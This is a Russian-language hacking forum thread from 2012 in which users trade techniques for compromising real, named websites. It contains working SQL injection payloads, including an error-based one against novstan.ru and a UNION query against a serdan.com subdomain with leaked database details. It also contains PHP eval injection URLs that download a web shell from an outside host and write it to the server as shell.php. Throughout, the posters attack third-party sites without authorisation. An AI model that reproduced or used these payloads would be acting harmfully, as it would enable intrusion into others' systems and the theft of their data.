ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.07.2012, 19:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Nightmarе
Nightmarе said:
Не могу раскрутить никак:
http://www.novstan.ru/search/?str=ass'
Как мне кажется, там запрос типа select * from search where ass like '%$_GET[str]%'
Но никак не получается текущий запрос перекрыть, чтобы свой выполнить, делал так:
ass'), ass%'), ass%')) и так далее, но видимо кардинально не то делаю, просьба помочь кто может.
Код:
Code:
http://www.novstan.ru/search/?str=%')or(1)group%2F%2A%2A%2Fby(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))%23
|
|
|
|
04.07.2012, 02:57
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от Melfis
Melfis said:
нулл-байт тут не при чём. В самом конфиге апача прописано куда можно ходить.
Не Apache, а PHP
|
|
|
05.07.2012, 00:42
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765
Репутация:
257
|
|
http://www.serdan.com/html/i_portals/index.php?p_origin=internal&p_name=content&p_id=MI-91
Оракл, я не силен
|
|
|
|
05.07.2012, 01:32
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от A_n_d_r_e_i
A_n_d_r_e_i said:
http://www.serdan.com/html/i_portals/index.php?p_origin=internal&p_name=content&p_id=MI-91
Оракл, я не силен
Там нет иньекции! Нашел на поддомене.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//intranet.serdan.com.co/DATAofertas/index.php?perfilId=2 union all select null,null,null,null--[/COLOR][/COLOR]
Version:
Сообщение от None
Microsoft SQL Server 2008 (SP1) - 10.0.2573.0 (X64) Feb 4 2011 11:27:06 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2)
User:
Сообщение от None
dataofertas
Database:
Сообщение от None
datahsc
|
|
|
|
07.07.2012, 17:44
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Залил мини шелл. Все ок. PHPINFO показывает.
Делаю запрос
Сообщение от None
http://site.com?index.php?a=eval(file_get_contents('http://site.ru/bla_bla.txt'));
Ничего не показывает. Начал гуглить... Перекодировал адрес сайта в BASE64.
Сообщение от None
http://site.com?index.php?a=eval(file_get_contents(base64 _decode (aHR0cDovL3I1Ny5iaXovcjU3LnR4dA==)));
Опять нет шелла(
allow_url_fopen On
allow_url_include Off
file_uploads On |
|
|
|
07.07.2012, 17:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
9872
Репутация:
2
|
|
Сообщение от None
При использовании функции eval() необходимо учитывать несколько факторов. Помните о том, что используемые строки должны содержать правильный PHP код, включая, к примеру, использование точки с запятой в завершение строки так, чтобы парсер не отключился на строке после eval() и правильно обработал строку code_str. Для совмещения вывода HTML и PHP кода вы можете использовать закрывающий тег PHP.
|
|
|
|
07.07.2012, 18:25
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от КOT
КOT said:
При использовании функции eval() необходимо учитывать несколько факторов. Помните о том, что используемые строки должны содержать правильный PHP код, включая, к примеру, использование точки с запятой в завершение строки так, чтобы парсер не отключился на строке после eval() и правильно обработал строку code_str. Для совмещения вывода HTML и PHP кода вы можете использовать закрывающий тег PHP.
Сделал так
Сообщение от None
http://site.com/index.php?a=eval(file_get_contents(base64_decode ('aHR0cDovL3I1Ny5iaXovcjU3LnR4dA==')));
PHPINFO выводит через Base64, а шелл не льется опять
|
|
|
|
07.07.2012, 18:29
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to aydin-ka
Если я правильно тебя понял, то $a = eval($_GET['a']);
Код:
Code:
http://site.com?index.php?a=file_put_contents("shell.php", file_get_contents("http://site/shell.txt"));
|
|
|
|
07.07.2012, 20:22
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от aydin-ka
aydin-ka said:
Сделал так
PHPINFO выводит через Base64, а шелл не льется опять
Изучи вот эти два топика:
Сообщение от None
/thread307894-osstudio.html
/showthread.php?t=191917
Должны помочь разобраться в твоем вопросе и болие.
|
|
|
|
07.07.2012, 22:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
19272
Репутация:
0
|
|
Подскажите как в vbulletin'е узнать название колонок и таблиц?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
